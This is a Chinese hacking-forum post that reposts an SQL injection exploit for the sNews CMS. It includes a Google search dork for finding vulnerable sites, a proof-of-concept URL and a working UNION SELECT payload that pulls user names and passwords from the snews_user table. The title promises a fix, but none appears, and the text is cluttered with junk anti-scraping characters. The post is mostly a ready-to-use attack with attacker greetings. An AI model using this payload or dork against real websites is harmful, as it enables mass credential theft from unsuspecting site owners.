找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2106|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability/ ~# R; V7 {: n9 }: i' X
作者: By onestree
; \: r: I! C: \4 C5 V; G% m下载地址 : http://snewscms.com/
8 M- i6 c8 ~/ D$ P& S测试平台 : ubuntu 12.10 / win 7, Z. l7 ^$ ^( ^- ^" e" P
关键词: inurl:"tanyakan pada rumput yang bergoyang"
* V: s) t) f, `% W # N  [$ _: |( g0 ~$ [/ {1 l* N" I

1 w- H. t5 o4 S+ ^; S9 z*************************************************************
. w7 p7 r1 v- c1 ?- n7 O
6 B, g( ^7 \, RSQL poc:
6 {. K; x5 t+ e2 t
' S- H' @& t3 t+ |3 Zhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]# B& y9 o: h4 b: Y
7 g8 B; d% C. j: \9 k3 x- E7 T
示例/ \1 ]# S1 Q( d( ]; @% G8 n8 t9 p

% z  ~& p9 x+ \* X/ jhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*2 w$ v) K; h3 C; _2 S6 B. k
- A8 h. a! C9 [+ f1 w
% r% ?4 ^: x2 P
致谢:# w2 F3 H7 H: k

/ w  c; n- d. e, ?  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell3 }% J- E& [- a# p
     8 s1 _! h& A' \* ]; r
          indonesiancoder - moeslimh4x0r - go-coder+ z' u) X" `6 k+ G- {  h4 w
, r( T: l" b; g' K* _
spesial my hunny :*' Y. U9 {4 z6 b' ?% D6 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表